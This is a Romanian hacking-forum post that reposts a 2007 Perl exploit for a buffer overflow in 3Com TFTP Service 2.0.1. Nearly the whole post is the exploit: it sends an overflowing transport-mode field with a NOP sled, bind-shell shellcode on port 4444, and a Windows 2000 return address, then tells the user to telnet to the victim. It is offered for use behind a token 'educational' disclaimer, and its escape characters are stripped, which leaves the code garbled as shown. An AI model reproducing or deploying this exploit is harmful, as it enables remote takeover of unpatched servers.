Hacking and more...
HaCkinG CulT
|
Lista Forumurilor Pe Tematici
|
Hacking and more... | Reguli | Inregistrare | Login
POZE HACKING AND MORE...
Nu sunteti logat.
|
Nou pe simpatie:
the_sexy_girl_alive 24 ani
 | Femeie
24 ani
Covasna
cauta Barbat
24 - 47 ani |
|
snark
Grand Master
 Inregistrat: acum 17 ani
Postari: 207
|
|
Code:
#!/usr/bin/perl -w
# ===============================================================================================
# 3Com TFTP Service <= 2.0.1 (Long Transporting Mode) Overflow Perl Exploit
# By Umesh Wanve ( )
# ==============================================================================================
# Credits : Liu Qixu is credited with the discovery of this vulnerability.
#
# Reference : http://www.securityfocus.com/bid/21301
#
# Date : 27-02-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Buffer overflow exists in transporting mode name of TFTP server.
#
# So here you go.
#
# Buffer = "x00x02" + "filename" + "x00" + nop sled + Shellcode + JUMP + "x00";
#
#
# This was written for educational purpose. Use it at your own risk.Author will be not be responsible for any damage.
#
# #
#===============================================================================================
use IO::Socket;
if(!($ARGV[1]))
{
print "n3COM Tftp long transport name exploitn";
print "tCoded by Umesh wanvenn";
print "Use: 3com_tftp.pl <host> <port>nn";
exit;
}
$target = IO::Socket::INET->new(Proto=>'udp',
PeerAddr=>$ARGV[0],
PeerPort=>$ARGV[1])
or die "Cannot connect to $ARGV[0] on port $ARGV[1]";
# win32_bind - EXITFUNC=seh LPORT=4444 Size=344 Encoder=PexFnstenvSub http://metasploit.com
my($shellcode)=
"x31xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73x13x48".
"xc8xb3x54x83xebxfcxe2xf4xb4xa2x58x19xa0x31x4cxab".
"xb7xa8x38x38x6cxecx38x11x74x43xcfx51x30xc9x5cxdf".
"x07xd0x38x0bx68xc9x58x1dxc3xfcx38x55xa6xf9x73xcd".
"xe4x4cx73x20x4fx09x79x59x49x0ax58xa0x73x9cx97x7c".
"x3dx2dx38x0bx6cxc9x58x32xc3xc4xf8xdfx17xd4xb2xbf".
"x4bxe4x38xddx24xecxafx35x8bxf9x68x30xc3x8bx83xdf".
"x08xc4x38x24x54x65x38x14x40x96xdbxdax06xc6x5fx04".
"xb7x1exd5x07x2exa0x80x66x20xbfxc0x66x17x9cx4cx84".
"x20x03x5exa8x73x98x4cx82x17x41x56x32xc9x25xbbx56".
"x1dxa2xb1xabx98xa0x6ax5dxbdx65xe4xabx9ex9bxe0x07".
"x1bx9bxf0x07x0bx9bx4cx84x2exa0xa2x08x2ex9bx3axb5".
"xddxa0x17x4ex38x0fxe4xabx9exa2xa3x05x1dx37x63x3c".
"xecx65x9dxbdx1fx37x65x07x1dx37x63x3cxadx81x35x1d".
"x1fx37x65x04x1cx9cxe6xabx98x5bxdbxb3x31x0excax03".
"xb7x1exe6xabx98xaexd9x30x2exa0xd0x39xc1x2dxd9x04".
"x11xe1x7fxddxafxa2xf7xddxaaxf9x73xa7xe2x36xf1x79".
"xb6x8ax9fxc7xc5xb2x8bxffxe3x63xdbx26xb6x7bxa5xab".
"x3dx8cx4cx82x13x9fxe1x05x19x99xd9x55x19x99xe6x05".
"xb7x18xdbxf9x91xcdx7dx07xb7x1exd9xabxb7xffx4cx84".
"xc3x9fx4fxd7x8cxacx4cx82x1ax37x63x3cxb8x42xb7x0b".
"x1bx37x65xabx98xc8xb3x54";
print "++ Building Malicous Packet .....n";
$nop="x90" x 129;
$jmp_2000 = "x0ex08xe5x77"; # jmp esi user32.dll windows 2000 sp4 english (on 27-02-2007)
$exploit = "x00x02"; #write request (header)
$exploit=$exploit."A"; #file name
$exploit=$exploit."x00"; #Start of transporting name
$exploit=$exploit.$nop; #nop sled to land into shellcode
$exploit=$exploit.$shellcode; #our Hell code
$exploit=$exploit.$jmp_2000; #jump to shellcode
$exploit=$exploit."x00"; #end of TS mode name
print $target $exploit; #Attack on victim
print "++ Exploit packet sent ...n";
print "++ Done.n";
print "++ Telnet to 4444 on victim's machine ....n";
sleep(2);
close($target);
exit;
#------------------------------------------------------------------------------------------------------------
# milw0rm.com [2007-02-28] |
_______________________________________
|
|
| pus acum 17 ani |
|